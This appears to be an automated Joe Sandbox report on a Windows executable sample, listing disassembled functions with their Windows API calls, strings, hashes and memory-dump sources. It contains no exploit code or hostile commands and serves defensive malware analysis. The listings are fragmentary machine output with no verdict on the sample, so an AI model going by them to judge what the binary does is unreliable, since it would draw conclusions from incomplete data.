                                                                                  • API String ID: 3832890014-4202584635
                                                                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                  • GetFocus.USER32 ref: 0046A0DD
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$CtrlFocus
                                                                                  • String ID: 0
                                                                                  • API String ID: 1534620443-4108050209
                                                                                  • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                  • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                  • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                  • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?), ref: 004558E3
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateDestroy
                                                                                  • String ID: ,$tooltips_class32
                                                                                  • API String ID: 1109047481-3856767331
                                                                                  • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                  • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                  • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                  • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                  • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                  • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                  • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                  • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                  • String ID: 0
                                                                                  • API String ID: 1441871840-4108050209
                                                                                  • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                  • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                  • __swprintf.LIBCMT ref: 00460915
                                                                                  • __swprintf.LIBCMT ref: 0046092D
                                                                                  • _wprintf.LIBCMT ref: 004609E1
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                  • API String ID: 3631882475-2268648507
                                                                                  • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                  • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                  APIs
                                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                  • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                  • SendMessageW.USER32 ref: 00471740
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                  • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                  • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                  • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                  • SendMessageW.USER32 ref: 0047184F
                                                                                  • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                  • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                  • String ID:
                                                                                  • API String ID: 4116747274-0
                                                                                  • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                  • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                  • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                  • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                  • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu$Sleep
                                                                                  • String ID: 0
                                                                                  • API String ID: 1196289194-4108050209
                                                                                  • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                  • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0043143E
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 3300687185-3887548279
                                                                                  • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                  • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                  APIs
                                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                  • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                  • API String ID: 1976180769-4113822522
                                                                                  • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                  • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                  • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                  • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                  • String ID:
                                                                                  • API String ID: 461458858-0
                                                                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                  • DeleteObject.GDI32(?), ref: 004301D0
                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3969911579-0
                                                                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                  • String ID: 0
                                                                                  • API String ID: 956284711-4108050209
                                                                                  • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                  • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                  • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                  • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                  • String ID: 0.0.0.0
                                                                                  • API String ID: 1965227024-3771769585
                                                                                  • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                  • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                  APIs
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
